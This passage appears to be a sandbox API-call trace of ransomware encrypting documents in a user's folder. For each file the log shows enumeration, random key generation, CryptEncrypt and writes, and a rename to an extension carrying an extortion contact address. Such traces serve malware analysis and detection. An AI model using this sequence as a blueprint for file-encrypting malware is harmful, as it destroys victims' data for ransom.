GetProcessHeap () returned 0x410000 [0120.766] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8c88 | out: hHeap=0x410000) returned 1 [0120.766] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\i6DBGVPdTHC.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\i6dbgvpdthc.xlsx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\i6DBGVPdTHC.xlsx.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\i6dbgvpdthc.xlsx.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.772] GetProcessHeap () returned 0x410000 [0120.772] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0120.772] FindNextFileW (in: hFindFile=0x48edf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98cdd110, ftCreationTime.dwHighDateTime=0x1d5a90a, ftLastAccessTime.dwLowDateTime=0xd9f60230, ftLastAccessTime.dwHighDateTime=0x1d5da1e, ftLastWriteTime.dwLowDateTime=0xd9f60230, ftLastWriteTime.dwHighDateTime=0x1d5da1e, nFileSizeHigh=0x0, nFileSizeLow=0x18fb1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iMzYdhPGFdUjw3n.docx", cAlternateFileName="IMZYDH~1.DOC")) returned 1 [0120.772] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iMzYdhPGFdUjw3n.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\imzydhpgfdujw3n.docx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a8 [0120.772] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.772] LockFile (hFile=0x4a8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x18fb1, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.772] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.772] ReadFile (in: hFile=0x4a8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.773] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.773] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.773] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8b80 | out: pbBuffer=0x4d8b80) returned 1 [0120.773] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2780 | out: pbBuffer=0x4b2780) returned 1 [0120.773] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iMzYdhPGFdUjw3n.docx", dwFileAttributes=0x80) returned 1 [0120.774] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iMzYdhPGFdUjw3n.docx") returned 61 [0120.774] GetProcessHeap () returned 0x410000 [0120.774] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xea) returned 0x449878 [0120.774] lstrcpyW (in: lpString1=0x449878, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iMzYdhPGFdUjw3n.docx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iMzYdhPGFdUjw3n.docx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iMzYdhPGFdUjw3n.docx" [0120.774] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iMzYdhPGFdUjw3n.docx", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iMzYdhPGFdUjw3n.docx.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iMzYdhPGFdUjw3n.docx.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.774] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=102321) returned 1 [0120.774] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x18fb1 [0120.774] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.774] GetProcessHeap () returned 0x410000 [0120.774] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8c88 [0120.774] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.776] WriteFile (in: hFile=0x4a8, lpBuffer=0x4d8c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8c88*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.778] WriteFile (in: hFile=0x4a8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.780] WriteFile (in: hFile=0x4a8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.781] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x18fb1) returned 0xf50048 [0120.782] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x18fb1) returned 0xf69008 [0120.782] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.782] ReadFile (in: hFile=0x4a8, lpBuffer=0xf50048, nNumberOfBytesToRead=0x18fb1, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesRead=0x367f44c*=0x18fb1, lpOverlapped=0x0) returned 1 [0120.787] UnlockFile (hFile=0x4a8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x18fb1, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.787] CloseHandle (hObject=0x4a8) returned 1 [0120.788] GetProcessHeap () returned 0x410000 [0120.789] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8c88 | out: hHeap=0x410000) returned 1 [0120.789] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iMzYdhPGFdUjw3n.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\imzydhpgfdujw3n.docx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iMzYdhPGFdUjw3n.docx.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\imzydhpgfdujw3n.docx.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.792] GetProcessHeap () returned 0x410000 [0120.792] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449878 | out: hHeap=0x410000) returned 1 [0120.792] FindNextFileW (in: hFindFile=0x48edf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f461370, ftCreationTime.dwHighDateTime=0x1d5dac6, ftLastAccessTime.dwLowDateTime=0x535d4be0, ftLastAccessTime.dwHighDateTime=0x1d5dbe3, ftLastWriteTime.dwLowDateTime=0x535d4be0, ftLastWriteTime.dwHighDateTime=0x1d5dbe3, nFileSizeHigh=0x0, nFileSizeLow=0x10651, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IXEoHGusYEHsiNVCzsxj.rtf", cAlternateFileName="IXEOHG~1.RTF")) returned 1 [0120.792] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IXEoHGusYEHsiNVCzsxj.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ixeohgusyehsinvczsxj.rtf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a8 [0120.793] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.793] LockFile (hFile=0x4a8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10651, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.793] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.793] ReadFile (in: hFile=0x4a8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.794] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.794] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.794] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8b80 | out: pbBuffer=0x4d8b80) returned 1 [0120.794] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2780 | out: pbBuffer=0x4b2780) returned 1 [0120.794] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IXEoHGusYEHsiNVCzsxj.rtf", dwFileAttributes=0x80) returned 1 [0120.794] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IXEoHGusYEHsiNVCzsxj.rtf") returned 65 [0120.794] GetProcessHeap () returned 0x410000 [0120.794] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xf2) returned 0x449878 [0120.794] lstrcpyW (in: lpString1=0x449878, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IXEoHGusYEHsiNVCzsxj.rtf" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IXEoHGusYEHsiNVCzsxj.rtf") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IXEoHGusYEHsiNVCzsxj.rtf" [0120.794] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IXEoHGusYEHsiNVCzsxj.rtf", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IXEoHGusYEHsiNVCzsxj.rtf.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IXEoHGusYEHsiNVCzsxj.rtf.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.794] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=67153) returned 1 [0120.794] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x10651 [0120.795] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.795] GetProcessHeap () returned 0x410000 [0120.795] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8c88 [0120.795] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.797] WriteFile (in: hFile=0x4a8, lpBuffer=0x4d8c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8c88*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.798] WriteFile (in: hFile=0x4a8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.799] WriteFile (in: hFile=0x4a8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.800] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10651) returned 0xf50048 [0120.801] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10651) returned 0xf606a8 [0120.801] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.801] ReadFile (in: hFile=0x4a8, lpBuffer=0xf50048, nNumberOfBytesToRead=0x10651, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesRead=0x367f44c*=0x10651, lpOverlapped=0x0) returned 1 [0120.805] UnlockFile (hFile=0x4a8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10651, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.805] CloseHandle (hObject=0x4a8) returned 1 [0120.806] GetProcessHeap () returned 0x410000 [0120.806] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8c88 | out: hHeap=0x410000) returned 1 [0120.806] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IXEoHGusYEHsiNVCzsxj.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ixeohgusyehsinvczsxj.rtf"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IXEoHGusYEHsiNVCzsxj.rtf.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ixeohgusyehsinvczsxj.rtf.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.808] GetProcessHeap () returned 0x410000 [0120.808] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449878 | out: hHeap=0x410000) returned 1 [0120.808] FindNextFileW (in: hFindFile=0x48edf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5e97b1d0, ftCreationTime.dwHighDateTime=0x1d57b44, ftLastAccessTime.dwLowDateTime=0xb0bb7790, ftLastAccessTime.dwHighDateTime=0x1d58b2e, ftLastWriteTime.dwLowDateTime=0xb0bb7790, ftLastWriteTime.dwHighDateTime=0x1d58b2e, nFileSizeHigh=0x0, nFileSizeLow=0x450a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jyvKHZ9HIKYs.pptx", cAlternateFileName="JYVKHZ~1.PPT")) returned 1 [0120.808] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jyvKHZ9HIKYs.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jyvkhz9hikys.pptx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a8 [0120.808] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.808] LockFile (hFile=0x4a8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x450a, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.809] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.809] ReadFile (in: hFile=0x4a8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.809] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.809] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.810] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8b80 | out: pbBuffer=0x4d8b80) returned 1 [0120.810] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2780 | out: pbBuffer=0x4b2780) returned 1 [0120.810] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jyvKHZ9HIKYs.pptx", dwFileAttributes=0x80) returned 1 [0120.810] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jyvKHZ9HIKYs.pptx") returned 58 [0120.810] GetProcessHeap () returned 0x410000 [0120.810] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe4) returned 0x467908 [0120.810] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jyvKHZ9HIKYs.pptx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jyvKHZ9HIKYs.pptx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jyvKHZ9HIKYs.pptx" [0120.810] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jyvKHZ9HIKYs.pptx", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jyvKHZ9HIKYs.pptx.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jyvKHZ9HIKYs.pptx.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.810] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=17674) returned 1 [0120.810] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x450a [0120.810] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.810] GetProcessHeap () returned 0x410000 [0120.810] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8c88 [0120.810] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.812] WriteFile (in: hFile=0x4a8, lpBuffer=0x4d8c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8c88*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.814] WriteFile (in: hFile=0x4a8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.815] WriteFile (in: hFile=0x4a8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.816] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x450a) returned 0x4dab68 [0120.816] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x450a) returned 0x4df080 [0120.816] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.816] ReadFile (in: hFile=0x4a8, lpBuffer=0x4dab68, nNumberOfBytesToRead=0x450a, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dab68*, lpNumberOfBytesRead=0x367f44c*=0x450a, lpOverlapped=0x0) returned 1 [0120.817] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=-17674, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.817] WriteFile (in: hFile=0x4a8, lpBuffer=0x4df080*, nNumberOfBytesToWrite=0x450a, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4df080*, lpNumberOfBytesWritten=0x367f44c*=0x450a, lpOverlapped=0x0) returned 1 [0120.818] UnlockFile (hFile=0x4a8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x450a, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.818] CloseHandle (hObject=0x4a8) returned 1 [0120.820] GetProcessHeap () returned 0x410000 [0120.820] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8c88 | out: hHeap=0x410000) returned 1 [0120.820] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jyvKHZ9HIKYs.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jyvkhz9hikys.pptx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jyvKHZ9HIKYs.pptx.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jyvkhz9hikys.pptx.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.825] GetProcessHeap () returned 0x410000 [0120.825] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0120.825] FindNextFileW (in: hFindFile=0x48edf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0624d90, ftCreationTime.dwHighDateTime=0x1d560e2, ftLastAccessTime.dwLowDateTime=0x64cc95d0, ftLastAccessTime.dwHighDateTime=0x1d5742c, ftLastWriteTime.dwLowDateTime=0x64cc95d0, ftLastWriteTime.dwHighDateTime=0x1d5742c, nFileSizeHigh=0x0, nFileSizeLow=0x46a8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KdNmmBPFn.xlsx", cAlternateFileName="KDNMMB~1.XLS")) returned 1 [0120.825] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KdNmmBPFn.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kdnmmbpfn.xlsx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a8 [0120.825] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.826] LockFile (hFile=0x4a8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x46a8, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.826] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.826] ReadFile (in: hFile=0x4a8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.826] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.827] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.827] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8b80 | out: pbBuffer=0x4d8b80) returned 1 [0120.827] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2780 | out: pbBuffer=0x4b2780) returned 1 [0120.827] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KdNmmBPFn.xlsx", dwFileAttributes=0x80) returned 1 [0120.827] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KdNmmBPFn.xlsx") returned 55 [0120.827] GetProcessHeap () returned 0x410000 [0120.827] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xde) returned 0x460008 [0120.827] lstrcpyW (in: lpString1=0x460008, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KdNmmBPFn.xlsx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KdNmmBPFn.xlsx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KdNmmBPFn.xlsx" [0120.827] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KdNmmBPFn.xlsx", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KdNmmBPFn.xlsx.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KdNmmBPFn.xlsx.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.827] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=18088) returned 1 [0120.827] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x46a8 [0120.827] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.827] GetProcessHeap () returned 0x410000 [0120.827] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8c88 [0120.827] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | 